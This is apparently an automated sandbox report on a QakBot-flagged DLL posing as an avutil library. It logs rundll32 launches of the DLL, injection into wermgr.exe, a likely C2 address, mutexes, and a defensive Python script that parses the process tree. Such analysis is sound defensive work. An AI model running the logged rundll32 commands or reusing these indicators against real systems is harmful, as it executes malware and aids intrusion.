Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://s.yimg.com/uu/api/res/1.2/NyxskLh1ww_qP2VNMLLXPg--~B/Zmk9c3RyaW07aD0xNDA7cT05MDt3PTE0MDthcHB
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://s.yimg.com/uu/api/res/1.2/YcilHawp_AKChrUBidk12w--~B/Zmk9c3RyaW07aD0zODg7cT05NTt3PTcyMDthcHB
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://s.yimg.com/uu/api/res/1.2/_CIJXKXQDZkVo9bAyJDDdA--~B/Zmk9c3RyaW07aD0yNDY7cT04MDt3PTQ0MDthcHB
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://s.yimg.com/uu/api/res/1.2/_thhUXx96QwnlqajJOOzag--~B/Zmk9c3RyaW07aD0yNDY7cT04MDt3PTQ0MDthcHB
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://s.yimg.com/uu/api/res/1.2/bgsoedXfbB0Gb9NBLPpSgA--~B/Zmk9c3RyaW07aD0zODY7cT04MDt3PTQ0MDthcHB
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://s.yimg.com/uu/api/res/1.2/h64YbbKcO2GsKYAy1QMRMw--~B/Zmk9c3RyaW07aD0zODY7cT04MDt3PTQ0MDthcHB
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://s.yimg.com/uu/api/res/1.2/xRSr.LEimIgdYlvzWwz1eg--~B/Zmk9c3RyaW07aD0xNDA7cT05MDt3PTE0MDthcHB
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://sb.scorecardresearch.com/p?c1=2&c2=7241469&c5=2023538075&c7=https%3A%2F%2Fwww.yahoo.com%2F&c
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://search.yahoo.com/search?p=
Source: rundll32.exe, rundll32.exe, 00000003.00000002.546649132.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.546624364.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000C.00000002.546734237.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000010.00000002.555876068.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000013.00000002.556014337.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000014.00000002.565392341.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, A290.dll String found in binary or memory: https://streams.videolan.org/upload/
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://www.ad.com/?utm_source=yahoo-home&amp;utm_medium=referral&amp;utm_campaign=ad-feedback&quot;
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://www.yahoo.com/
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://www.yahoo.com/px.gif
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://yep.video.yahoo.com/oath/js/1/oath-player.js?ypv=8.5.43&lang=en-US
Source: unknown HTTP traffic detected: POST /t5 HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 188.28.19.84Content-Length: 77Cache-Control: no-cache
Source: unknown DNS traffic detected: queries for: yahoo.com
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1004D9B0 mv_thread_message_queue_recv,AcquireSRWLockExclusive,SleepConditionVariableSRW,SleepConditionVariableSRW,mv_fifo_can_read,mv_fifo_can_read,ReleaseSRWLockExclusive,mv_fifo_read,WakeConditionVariable,mv_fifo_can_read, 3_2_1004D9B0
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: yahoo.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: www.yahoo.comConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 98.137.11.163:443 -> 192.168.2.4:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 87.248.100.215:443 -> 192.168.2.4:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.28.19.84:443 -> 192.168.2.4:49727 version: TLS 1.2
Source: loaddll32.exe, 00000000.00000002.550583540.00000000014DB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: A290.dll Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DEBUG_STRIPPED, DLL
Source: 20.2.rundll32.exe.5f1170.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_QakBot_ConfigExtraction_Feb23 cape_options = bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config, date = 2023-02-17, author = kevoreilly, description = QakBot Config Extraction, reference = https://github.com/kevoreilly/CAPEv2/blob/master/analyzer/windows/data/yara/QakBot.yar, license = https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE, packed = f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68
Source: 20.2.rundll32.exe.ad0000.1.unpack, type: UNPACKEDPE Matched rule: MAL_QakBot_ConfigExtraction_Feb23 cape_options = bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config, date = 2023-02-17, author = kevoreilly, description = QakBot Config Extraction, reference = https://github.com/kevoreilly/CAPEv2/blob/master/analyzer/windows/data/yara/QakBot.yar, license = https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE, packed = f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68
Source: 20.2.rundll32.exe.5f1170.0.unpack, type: UNPACKEDPE Matched rule: MAL_QakBot_ConfigExtraction_Feb23 cape_options = bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config, date = 2023-02-17, author = kevoreilly, description = QakBot Config Extraction, reference = https://github.com/kevoreilly/CAPEv2/blob/master/analyzer/windows/data/yara/QakBot.yar, license = https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE, packed = f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2460 -s 652
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000D060 3_2_1000D060
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10028070 3_2_10028070
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1002B0B0 3_2_1002B0B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000B0D0 3_2_1000B0D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10008144 3_2_10008144
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1002A1A1 3_2_1002A1A1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_100101D0 3_2_100101D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1001021B 3_2_1001021B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10027220 3_2_10027220
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10033261 3_2_10033261
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10007270 3_2_10007270
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10024280 3_2_10024280
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10023350 3_2_10023350
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_100353B0 3_2_100353B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_100243C0 3_2_100243C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10013480 3_2_10013480
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1004D4B0 3_2_1004D4B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1004C4C0 3_2_1004C4C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000D4D0 3_2_1000D4D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1001F523 3_2_1001F523
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_100105C0 3_2_100105C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_100215D0 3_2_100215D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000164B 3_2_1000164B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_100206A7 3_2_100206A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10010750 3_2_10010750
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000E760 3_2_1000E760
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10010778 3_2_10010778
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1002A800 3_2_1002A800
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10030800 3_2_10030800
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000B830 3_2_1000B830
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10026870 3_2_10026870
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10001900 3_2_10001900
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10091900 3_2_10091900
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000D910 3_2_1000D910
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1001F91B 3_2_1001F91B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1009D970 3_2_1009D970
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10010980 3_2_10010980
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1001099C 3_2_1001099C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_100339B9 3_2_100339B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000C9F0 3_2_1000C9F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000FA00 3_2_1000FA00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000AA10 3_2_1000AA10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10091A40 3_2_10091A40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10007A50 3_2_10007A50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000EAC0 3_2_1000EAC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000FAE0 3_2_1000FAE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000FAF7 3_2_1000FAF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10025B0C 3_2_10025B0C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000AB30 3_2_1000AB30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10003BA5 3_2_10003BA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000FBC0 3_2_1000FBC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10001C10 3_2_10001C10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000DC10 3_2_1000DC10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000EC10 3_2_1000EC10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10031C30 3_2_10031C30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000BC40 3_2_1000BC40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10004C96 3_2_10004C96
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000ECC9 3_2_1000ECC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000DD40 3_2_1000DD40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000CD50 3_2_1000CD50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1002DD90 3_2_1002DD90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000EDB0 3_2_1000EDB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10007DC0 3_2_10007DC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00AE71FF 20_2_00AE71FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00AE8D30 20_2_00AE8D30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00AE320D 20_2_00AE320D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00AE4A6F 20_2_00AE4A6F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00AD3A40 20_2_00AD3A40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00AE6E40 20_2_00AE6E40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00ADA823 GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory, 20_2_00ADA823
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00ADA412 NtAllocateVirtualMemory,NtWriteVirtualMemory, 20_2_00ADA412
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00ADCA0F NtAllocateVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,NtFreeVirtualMemory, 20_2_00ADCA0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00AE43F4 NtProtectVirtualMemory,NtProtectVirtualMemory, 20_2_00AE43F4
Source: A290.dll Binary or memory string: OriginalFilenameavutil-lav-57.dll. vs A290.dll
Source: C:\Windows\SysWOW64\wermgr.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\wermgr.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wermgr.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\wermgr.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\wermgr.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\wermgr.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\wermgr.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\wermgr.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\wermgr.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\wermgr.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\wermgr.exe Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\wermgr.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\wermgr.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\wermgr.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\wermgr.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\wermgr.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wermgr.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wermgr.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wermgr.exe Section loaded: ncryptsslp.dll
Source: A290.dll Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\A290.dll"
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\A290.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\A290.dll,mv_add_i
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\A290.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2460 -s 652
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 660
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\A290.dll,mv_add_q
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\A290.dll,mv_add_stable
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5616 -s 652
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\A290.dll",mv_add_i
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\A290.dll",mv_add_q
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\A290.dll",mv_add_stable
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\A290.dll",next
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\A290.dll",mvutil_license
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6944 -s 652
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\A290.dll",mvutil_configuration
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5860 -s 652
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\A290.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\A290.dll,mv_add_i
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\A290.dll,mv_add_q
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\A290.dll,mv_add_stable
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\A290.dll",mv_add_i
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\A290.dll",mv_add_q
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\A290.dll",mv_add_stable
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\A290.dll",next
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\A290.dll",mvutil_license
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\A290.dll",mvutil_configuration
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\A290.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
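Read as a tree, the process-creation entries above run from loaddll32.exe through cmd.exe and rundll32.exe (each export of A290.dll tried in turn, plus ordinal #1) into wermgr.exe, with WerFault.exe started for every rundll32.exe instance that crashed. The script below is an added example, not part of this report or of the sample: it parses entries in the report's own "Source: <parent> Process created: <child> <command line>" shape (five lines copied from above are embedded as a constructed sample so it runs offline), lists the DLL exports rundll32.exe was asked to invoke, recovers the crashed PIDs from the WerFault.exe -p arguments, and flags the rundll32.exe to wermgr.exe pairing. Treating that pairing as the injection hand-off is this example's assumption (wermgr.exe is normally started by the WER service, not by rundll32.exe); the report's own evidence is the "Memory written: C:\Windows\SysWOW64\wermgr.exe" entries further down.

```python
import ntpath
import re
from collections import defaultdict

# Constructed sample input (not read from a live report): five "Process
# created" lines copied from the entries above so the script runs offline.
SAMPLE_LINES = r"""
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\A290.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\A290.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\A290.dll,mv_add_i
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2460 -s 652
""".strip().splitlines()

# Report line shape: "Source: <parent image> Process created: <child image> <command line>"
EVENT_RE = re.compile(r"^Source: (?P<parent>\S+) Process created: (?P<image>\S+) (?P<cmdline>.*)$")
# rundll32 invocations: rundll32.exe "path\x.dll",export   or   rundll32.exe path\x.dll,export
EXPORT_RE = re.compile(r'rundll32\.exe\s+"?(?P<dll>[^",]+\.dll)"?,(?P<export>\S+)', re.IGNORECASE)

# Parent/child pairing this example treats as the injection hand-off. That
# wermgr.exe is not a normal child of rundll32.exe is an assumption of this
# rule, not something the report states; the report's evidence is the
# "Memory written: wermgr.exe" entries.
SUSPICIOUS_PAIRS = {("rundll32.exe", "wermgr.exe")}


def parse_events(lines):
    """Parse report lines into dicts with lower-cased image basenames."""
    events = []
    for line in lines:
        m = EVENT_RE.match(line.strip())
        if m:
            events.append({
                "parent": ntpath.basename(m["parent"]).lower(),
                "image": ntpath.basename(m["image"]).lower(),
                "cmdline": m["cmdline"],
            })
    return events


def build_tree(events):
    """Map each parent image to the child images it created, in report order."""
    tree = defaultdict(list)
    for ev in events:
        tree[ev["parent"]].append(ev["image"])
    return dict(tree)


def rundll32_exports(events):
    """Set of (dll basename, export) pairs rundll32.exe was asked to run.
    An export written as #N is an ordinal, as in the cmd.exe /C line."""
    found = set()
    for ev in events:
        if ev["image"] == "rundll32.exe":
            m = EXPORT_RE.search(ev["cmdline"])
            if m:
                found.add((ntpath.basename(m["dll"]), m["export"]))
    return found


def flag_handoffs(events):
    """Parent/child pairs matching SUSPICIOUS_PAIRS, in report order."""
    return [(ev["parent"], ev["image"]) for ev in events
            if (ev["parent"], ev["image"]) in SUSPICIOUS_PAIRS]


def crashed_pids(events):
    """PIDs passed to WerFault.exe via -p: the processes that crashed."""
    pids = []
    for ev in events:
        if ev["image"] == "werfault.exe":
            m = re.search(r"-p (\d+)", ev["cmdline"])
            if m:
                pids.append(int(m.group(1)))
    return pids


if __name__ == "__main__":
    evs = parse_events(SAMPLE_LINES)
    for parent, children in build_tree(evs).items():
        print(f"{parent} -> {', '.join(children)}")
    print("exports invoked:", sorted(rundll32_exports(evs)))
    print("injection hand-offs:", flag_handoffs(evs))
    print("crashed PIDs:", crashed_pids(evs))
```

Run against the full list of entries above, the same parser yields one WerFault.exe child per crashed rundll32.exe (PIDs 2460, 5508, 5616, 6944, 5860) and a single rundll32.exe to wermgr.exe edge, which is the process to examine for injected code.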
Source: C:\Windows\SysWOW64\wermgr.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Ymdmdosqoawo
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER8532.tmp
Source: classification engine Classification label: mal100.troj.evad.winDLL@31/24@2/100
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00ADD213 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket, 20_2_00ADD213
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00ADC71C CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification, 20_2_00ADC71C
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\A290.dll,mv_add_i
Source: C:\Windows\SysWOW64\wermgr.exe Mutant created: \Sessions\1\BaseNamedObjects\{C2305DE9-81F7-4032-97E9-671A0F043C28}
Source: C:\Windows\SysWOW64\wermgr.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{281F1E04-E2C5-4D9F-895E-6E44B85850EA}
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2460
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6444:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5616
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5508
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5860
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6944
Source: C:\Windows\SysWOW64\wermgr.exe Mutant created: \Sessions\1\BaseNamedObjects\{281F1E04-E2C5-4D9F-895E-6E44B85850EA}
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts (repeated 10 times)
Source: C:\Windows\SysWOW64\wermgr.exe File read: C:\Windows\System32\drivers\etc\hosts (repeated 3 times)
Source: A290.dll Static PE information: 582 exports found (more than the 100-export threshold)
Source: A290.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1001F523 mv_dict_get,LoadLibraryA,LoadLibraryA,InitOnceBeginInitialize,InitOnceComplete,LoadLibraryA,GetProcAddress,mv_log,atoi,mv_log,mv_log,GetProcAddress, 3_2_1001F523
Source: A290.dll Static PE information: real checksum: 0xf1b7b should be: 0x100382

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6632 base: D03C50 value: E9 63 D7 45 FF
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX (repeated 2 times)
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX (repeated 20 times)
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX (repeated 20 times)
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX (repeated 2 times)
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX (repeated 20 times)
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX (repeated 5 times)
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX (repeated 20 times)
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX (repeated 20 times)
Source: C:\Windows\SysWOW64\wermgr.exe Process information set: NOOPENFILEERRORBOX (repeated 4 times)

Malware Analysis System Evasion

